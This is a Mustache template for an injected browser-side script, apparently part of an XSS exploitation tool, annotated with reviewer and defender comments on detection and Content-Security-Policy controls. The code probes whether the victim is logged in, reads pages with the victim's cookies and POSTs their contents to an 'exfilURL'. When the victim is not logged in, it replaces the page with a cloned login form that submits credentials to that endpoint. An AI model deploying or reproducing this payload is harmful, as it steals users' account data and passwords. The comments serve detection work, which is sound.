/*
 * This outer function container ensures that we don't leak variables globally.
 */
/*
 * NOTE(review): this is a Mustache template (`{{ }}` placeholders) that renders
 * to a browser-side script, so it is not valid JavaScript until rendered. As
 * written it (1) fetches a probe page to decide whether the current user is
 * logged in, (2) if so, fetches a list of URLs and POSTs their bodies to the
 * configured exfil endpoint, and (3) otherwise replaces the document with the
 * fetched login page and points its forms at that endpoint. The comments below
 * record where each step is observable or blockable by the hosting site, for
 * use when writing detections or a Content-Security-Policy.
 */
(function() {
// Template inputs. Triple-mustache `{{{ }}}` emits values unescaped, so each is
// expected to already be a complete JS literal (e.g. a quoted string). A value
// containing an unbalanced quote or a `*/` sequence fails the whole script at
// parse time rather than at runtime.
var loginCheckURL = {{{loginCheckURL}}};
// Inserted raw inside a regex literal; an invalid pattern is a SyntaxError for
// the entire IIFE. The `i` flag makes the logged-in check case-insensitive.
var loginCheckPattern = /{{{loginCheckPattern}}}/i;
var loginURL = {{{loginURL}}};
var exfilURL = {{{exfilURL}}};
/*
 * We load in jQuery in a way which doesn't expose it to the surrounding page.
 * This avoids issues with differing jQuery versions breaking target sites.
 */
// Defender note: this is a script element appended to <head> with a fixed
// third-party src. A CSP `script-src` that does not allow code.jquery.com (or
// that uses nonces/hashes) prevents `onload` from ever firing, which stops
// everything below.
var script = document.createElement("script");
script.src = 'https://code.jquery.com/jquery-3.2.1.min.js';
script.type = 'text/javascript';
script.onload = function() {
(function($) {
/*
 * As there are multiple ways to trigger our actions, set them up as functions.
 */
function onLoggedIn() {
/*
 * The user is logged in - load the resources and send them to the exfil endpoint.
 * This request will be launched when all resources load, or a 5s timeout elapses.
 */
// `isSent` guards against `exfil` running twice (once from the last fetch
// callback and once from the 5s timer). `xdata` collects one record per
// fetched URL; `remaining` counts down from the rendered URL count.
var isSent = false;
var xdata = [];
var remaining = {{dataURLCount}};
var exfil = function() {
if (!isSent) {
// The collected responses leave the page as a plain form POST, not XHR. This
// is a top-level navigation to `exfilURL`: it is visible in the address bar
// and proxy logs, and a CSP `form-action` directive (not `connect-src`) is the
// control that blocks it.
var form = $('<form>');
form.attr('method', 'POST');
form.attr('action', exfilURL);
for (var i = 0; i < xdata.length; i++) {
for (var k in xdata[i]) {
if (xdata[i].hasOwnProperty(k)) {
// Field names are key + index (e.g. "url0", "response0").
var tag = $('<input>');
tag.attr('name', k + i);
tag.val(xdata[i][k]);
form.append(tag);
}
}
}
$('body').append(form);
form.submit();
}
isSent = true;
}
// One jQuery request per rendered entry. These run from the page origin, so
// the same-origin policy (or the target's CORS policy) bounds which URLs can
// actually be read; each one appears in the site's access logs as a request
// carrying the victim's cookies.
// NOTE(review): `{{{#data}}}` is not standard Mustache section syntax —
// confirm the template engine renders it as intended.
{{#dataURLs}}
$.{{method}}({{{url}}}{{{#data}}}, function(r) {
xdata.push({url: {{{url}}}, method: '{{{method}}}', response: r});
remaining -= 1;
if (remaining <= 0) { exfil(); }
}, 'text');
{{/dataURLs}}
// Fallback trigger: send whatever was collected after 5 s even if some
// requests never completed.
window.setTimeout(exfil, 5000);
}
function onNotLoggedIn() {
/*
 * The user is not logged in - fake load the login page then alter the forms.
 */
// Rewrites the displayed URL to `loginURL` without a navigation, so the
// address bar matches the cloned login page. No request is made here; the
// only server-side trace is the `$.get` below.
if (window.history && window.history.replaceState) {
window.history.replaceState({}, "Login", loginURL)
} else if (window.history && window.history.pushState) {
window.history.pushState({}, "Login", loginURL)
}
// Replaces the entire body with the fetched login markup and retargets every
// <form> on it. `form-action` in CSP is again the relevant control; a login
// form served from a different origin than the injected page cannot be
// fetched this way without CORS.
$.get(loginURL, function(r) {
$('body').html(r);
$('form').attr('action', exfilURL);
}, 'text');
}
/*
 * Fetch a page to check whether the user is logged in.
 */
// A failed probe (network error, non-2xx) is treated the same as "not logged
// in" via `.fail`, so the phishing branch is the default path.
$.get(loginCheckURL, function(r) {
if (r.match(loginCheckPattern)) {
onLoggedIn();
} else {
onNotLoggedIn();
}
}, 'text').fail(onNotLoggedIn);
})(window.jQuery.noConflict(true)) // noConflict(true) reverses changes to all globals
};
document.getElementsByTagName("head")[0].appendChild(script);
})();